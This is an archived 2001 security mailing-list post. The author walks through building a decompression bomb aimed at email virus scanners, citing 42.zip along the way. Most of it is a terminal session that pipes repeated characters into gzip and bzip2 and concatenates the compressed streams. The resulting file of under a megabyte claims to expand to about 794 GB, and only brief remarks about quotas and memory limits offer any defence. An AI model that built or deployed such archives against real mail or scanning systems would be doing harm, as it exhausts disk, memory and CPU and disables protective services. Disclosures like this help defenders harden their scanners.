-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Sun, 24 Jun 2001 bill_weissat_private wrote: > Aycan Irican(aycanat_private)@Sat, Jun 23, 2001 at 10:50:14AM +0300: > > > > > > On Thu, 21 Jun 2001, Robert Davidson Security wrote: > > > > > On Tue, Jun 19, 2001 at 08:53:54PM +0200, Michel Arboi wrote: > > > > --- Markus 'FvD' Weber <fvdat_private> a écrit : > > > > > There is 42.zip out there, 42K total size, which consists of > > > > > nested zip's and at the end a 4GB file (IIRC 6 levels deep, > > > > > each level 17 'wide') ... kills most email virus checker. > > > > > > > > I did not know it existed. Altavista found this on > > > > http://www.hanau.net/fgk/downloads/42.zip > > > > > > > > Why is this kind of attack not more common? I suspect that most filters > > > > are vulnerable and yet, they are not listed as such (e.g. on > > > > securityfocus). And companies continue to use them. > > > > > > This used to be really common with BBS's back in their day. The idea > > > back then was to get a 1Gb file full of null charactors, compress it > > > and upload it to the BBS, that way when the BBS's virus scanner (which > > > also uncompressed the file) attempted to check the archive for viruses, > > > it would either 1) consume all disk space, 2) keep the system busy for > > > ages (some people ran 386's and 486's back then). The normal thing a > > > user would do is upload the file and then hang up, which also leaves > > > that dial-up line off-line while the virus scanner is checking the > > > contents of the archive. > > > > > > -- > > > Regards, > > > Robert Davidson. > > > > > > > oh yes, the old days ...I used pcboard on my BBS and the pfed file > > integrity checker can run any batch job when a line starts with '@'. > > It's an old vulnerability i know. > > > > Maybe we should put disk quota for the user that runs virus scannner > > thingy. > > > > There's a thought. > > Why not just use proc/mem limits to keep it from overrunning the box? > Sure, email delivery time goes to hell, but it could fork off other jobs, > do the massive compress thing slowly. > Some Text That i wrote this night...Ofcourse proc/mem limit is a solution. # Making a president for ENTERPRISE E-MAIL VIRUS SCANNERS. # By Aycan Irican (a.k.a. FiXxXeR) # aycanat_private # # Viruses in e-mails are today's well known problem. The simplest approach is to use # an e-mail virus scanner like SOPHOS, Amavis, Inflex etc...But If misconfigured # these tools can be very dangerous. Think of a compressed file that is constructed # billions and billions of A's in it. If we can easily create a file like that, and # compress it with well known compression tools. voila :) # # There are numerous methods that can be used to create it. But most are time # consuming and storage eater. I introduce my approach to this solution. Let me say; # # Updated Version of this text can or cannot be found from # http://mars.prosoft.com.tr/ First I don't want to create a very HUGE file. Instead, I want to use a pipe. [fixxxer@uranus alientech]$ perl -e 'print "A"x1000000000' | gzip -f | dd of=file1 Out of memory! 0+1 records in 0+1 records out Hmzz.. That's good I have 256 Megs of RAM and it sucked... [fixxxer@uranus alientech]$ free total used free shared buffers cached Mem: 255624 155652 99972 2068 4648 100860 -/+ buffers/cache: 50144 205480 Swap: 308200 75804 232396 Ok don't panic. I can find another genius way... [fixxxer@uranus alientech]$ perl -e 'print "A"x10' | gzip -f | dd of=file1 0+1 records in 0+1 records out [fixxxer@uranus alientech]$ perl -e 'print "B"x10' | gzip -f | dd of=file2 0+1 records in 0+1 records out [fixxxer@uranus alientech]$ ls -al total 16 drwxrwxr-x 2 fixxxer fixxxer 4096 Jun 24 23:28 . drwx------ 35 fixxxer fixxxer 4096 Jun 24 23:16 .. -rw-rw-r-- 1 fixxxer fixxxer 23 Jun 24 23:28 file1 -rw-rw-r-- 1 fixxxer fixxxer 23 Jun 24 23:28 file2 [fixxxer@uranus alientech]$ cat file2 >> file1 [fixxxer@uranus alientech]$ zcat file1 AAAAAAAAAABBBBBBBBBB[fixxxer@uranus alientech]$ That's good. I can concantane gzipped files and it doesn't sucked :) So I must find the maximum byte size that I can pipe to gzip. [fixxxer@uranus alientech]$ perl -e 'print "A"x450000000' | gzip -f | dd of=file1 853+1 records in 853+1 records out That's enough for now. But what else compression levels :) Can we use bzip2 ? :) [fixxxer@uranus alientech]$ perl -e 'print "A"x10' | bzip2 -f | dd of=file1 0+1 records in 0+1 records out [fixxxer@uranus alientech]$ perl -e 'print "B"x10' | bzip2 -f | dd of=file2 0+1 records in 0+1 records out [fixxxer@uranus alientech]$ ls -al total 16 drwxrwxr-x 2 fixxxer fixxxer 4096 Jun 24 23:47 . drwx------ 35 fixxxer fixxxer 4096 Jun 24 23:45 .. -rw-rw-r-- 1 fixxxer fixxxer 39 Jun 24 23:47 file1 -rw-rw-r-- 1 fixxxer fixxxer 39 Jun 24 23:47 file2 [fixxxer@uranus alientech]$ bzcat file1 AAAAAAAAAABBBBBBBBBB[fixxxer@uranus alientech]$ That's good :) Let's compare gzip and bzip2 [fixxxer@uranus alientech]$ perl -e 'print "A"x45000000' | bzip2 -9 -f | dd of=file1 0+1 records in 0+1 records out [fixxxer@uranus alientech]$ perl -e 'print "A"x45000000' | gzip -9 -f | dd of=file2 85+1 records in 85+1 records out [fixxxer@uranus alientech]$ ls -al drwxrwxr-x 2 fixxxer fixxxer 4096 Jun 24 23:51 . drwx------ 35 fixxxer fixxxer 4096 Jun 24 23:45 .. -rw-rw-r-- 1 fixxxer fixxxer 50 Jun 24 23:50 file1 -rw-rw-r-- 1 fixxxer fixxxer 43703 Jun 24 23:51 file2 Umz ...bzip2 uses different algo ...but gzip is used everywhere. I don't know which scanner compatible with bzip2(any ideas?)...No problem I can add some bzip2 file to my last HUGE file :) Let's start the real work: [fixxxer@uranus alientech]$ /usr/bin/time \ >-v perl -e 'print "A"x450000000' | gzip -9 -f | dd of=file2.gz Command being timed: "perl -e print "A"x450000000" User time (seconds): 1.85 System time (seconds): 7.65 Percent of CPU this job got: 9% Elapsed (wall clock) time (h:mm:ss or m:ss): 1:41.27 Average shared text size (kbytes): 0 Average unshared data size (kbytes): 0 Average stack size (kbytes): 0 Average total size (kbytes): 0 Maximum resident set size (kbytes): 0 Average resident set size (kbytes): 0 Major (requiring I/O) page faults: 4395 Minor (reclaiming a frame) page faults: 167543 Voluntary context switches: 0 Involuntary context switches: 0 Swaps: 0 File system inputs: 0 File system outputs: 0 Socket messages sent: 0 Socket messages received: 0 Signals delivered: 0 Page size (bytes): 4096 Exit status: 0 853+1 records in 853+1 records out [fixxxer@uranus alientech]$ /usr/bin/time -v \ >perl -e 'print "A"x400000000' | bzip2 -9 -f | dd of=file1.bz2 Command being timed: "perl -e print "A"x400000000" User time (seconds): 1.48 System time (seconds): 5.49 Percent of CPU this job got: 5% Elapsed (wall clock) time (h:mm:ss or m:ss): 2:06.35 Average shared text size (kbytes): 0 Average unshared data size (kbytes): 0 Average stack size (kbytes): 0 Average total size (kbytes): 0 Maximum resident set size (kbytes): 0 Average resident set size (kbytes): 0 Major (requiring I/O) page faults: 4203 Minor (reclaiming a frame) page faults: 155279 Voluntary context switches: 0 Involuntary context switches: 0 Swaps: 0 File system inputs: 0 File system outputs: 0 Socket messages sent: 0 Socket messages received: 0 Signals delivered: 0 Page size (bytes): 4096 Exit status: 0 0+1 records in 0+1 records out And you really want to see the results :) ok here is the ls output: [fixxxer@uranus alientech]$ ls -al total 444 drwxrwxr-x 2 fixxxer fixxxer 4096 Jun 25 00:07 . drwx------ 35 fixxxer fixxxer 4096 Jun 24 23:45 .. -rw-rw-r-- 1 fixxxer fixxxer 333 Jun 25 00:09 file1.bz2 -rw-rw-r-- 1 fixxxer fixxxer 436765 Jun 25 00:02 file2.gz Let's copy a temp and concantane files in a loop... ...bla ...bla ...bla [fixxxer@uranus alientech]$ ls -al total 792 drwxrwxr-x 2 fixxxer fixxxer 4096 Jun 25 00:18 . drwx------ 35 fixxxer fixxxer 4096 Jun 24 23:45 .. -rw-rw-r-- 1 fixxxer fixxxer 354978 Jun 25 00:14 file1.bz2 -rw-rw-r-- 1 fixxxer fixxxer 436765 Jun 25 00:02 file2.gz [fixxxer@uranus alientech]$ echo "400000000*354978/333/(1024^3)" | bc 397 400000000 is the byte that I pumped into the pipe 354978 is the final .bz2 file size 333 is the initial .bz2 file size (1024^3) is a conversion factor for converting byte to GigaByte. I have 397 GigaBytes of DATA, I have 397 GigaBytes of DATA, I have 397 GigaBytes of DATA :) [fixxxer@uranus alientech]$ cp file1.bz2 file2.bz2 [fixxxer@uranus alientech]$ cat file2.bz2 >> file1.bz2 Ops I have 794 Gigs now :) -rw-rw-r-- 1 fixxxer fixxxer 709956 Jun 25 00:28 file1.bz2 I think virus scanners have a problem :) Imagination Limitless... Aycan Irican [fixxxer@uranus alientech]$ date Mon Jun 25 00:30:11 EEST 2001 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: Made with pgp4pine 1.76 iD8DBQE7NmA/KkmbCdcOSYwRArlMAJ0S8jBQ4TMuhcHrIIh5Ozk03aJvQQCfZCHa JURIWc5+4pFKf1nea4CtkrA= =nukX -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Sun Jun 24 2001 - 20:29:46 PDT